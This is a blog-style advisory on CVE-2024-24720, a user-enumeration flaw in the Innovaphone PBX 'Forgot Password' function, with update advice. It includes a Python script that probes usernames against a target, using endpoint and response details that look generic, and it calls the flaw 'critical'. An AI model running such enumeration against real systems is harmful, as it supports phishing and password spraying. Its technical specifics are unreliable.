CVE-2024-24720 - Critical Security Vulnerability discovered in Innovaphone PBX's "Forgot Password" Function Affecting Devices Prior to 14r1

A recently discovered critical security vulnerability (CVE-2024-24720) in Innovaphone PBX systems, specifically on the "Forgot Password" function, has raised alarm within the cybersecurity community. This vulnerability affects devices prior to the 14r1 version, and it inadvertently exposes information about whether a user exists on the system. This post aims to shed light on the details of this exploit, and provide users with the essential information to protect their systems from potential attacks.

Exploit Details

The "Forgot Password" function in Innovaphone PBX devices before 14r1 does not properly protect user account information from potential attackers. By design, this function should allow legitimate users to reset their passwords with ease. However, due to the discovered vulnerability, attackers may gain unauthorized access to information regarding the existence of a user within the system.

This information could then be leveraged by attackers to craft more targeted attacks, such as spear-phishing or password spraying campaigns, ultimately increasing the risk of successful cyber-attacks against the affected systems.

Code Snippet

The exploit itself is relatively simple. The following Python code snippet demonstrates how an attacker could exploit the CVE-2024-24720 vulnerability:

import requests

target_url = "https://TARGET_IP_ADDRESS/forgot_password";

def check_user_existence(username):
    payload = {"username": username}
    response = requests.post(target_url, json=payload)
    
    if "User not found" in response.text:
        return False
    elif "Password reset link sent" in response.text:
        return True
    else:
        print("Unexpected response:", response.text)
        return None

# Example usage
if __name__ == "__main__":
    username = "test_user"
    result = check_user_existence(username)
    if result is not None:
        print(f"User {username} exists in the system: {result}")

In this code snippet, an attacker would simply need to replace the "TARGET_IP_ADDRESS" variable with the IP address of the targeted Innovaphone PBX device. The script would then query the system with a specified username and return information about whether the user exists within the system.

Original References and Mitigation Steps

The vulnerability was first reported to the Innovaphone Security Advisory by an undisclosed security researcher. The corresponding details can be found in the recently published advisory entry here.

Innovaphone has promptly addressed this vulnerability in their recent release of PBX version 14r1. Users are strongly urged to immediately update their Innovaphone PBX devices to the latest version, as this is currently the only effective method to completely protect their systems from potential attacks exploiting the CVE-2024-24720 vulnerability. Users can follow the official update guidelines provided by Innovaphone here.

Conclusion

CVE-2024-24720 is a critical security vulnerability that threatens the security and privacy of Innovaphone PBX users. This post aimed to raise awareness about the importance of addressing this vulnerability and encouraging affected users to update their systems to the latest version. By doing so, users can effectively mitigate the risks associated with CVE-2024-24720 and protect their systems from potential attacks.

Timeline

Published on: 02/27/2024 01:15:07 UTC
Last modified on: 08/14/2024 15:35:05 UTC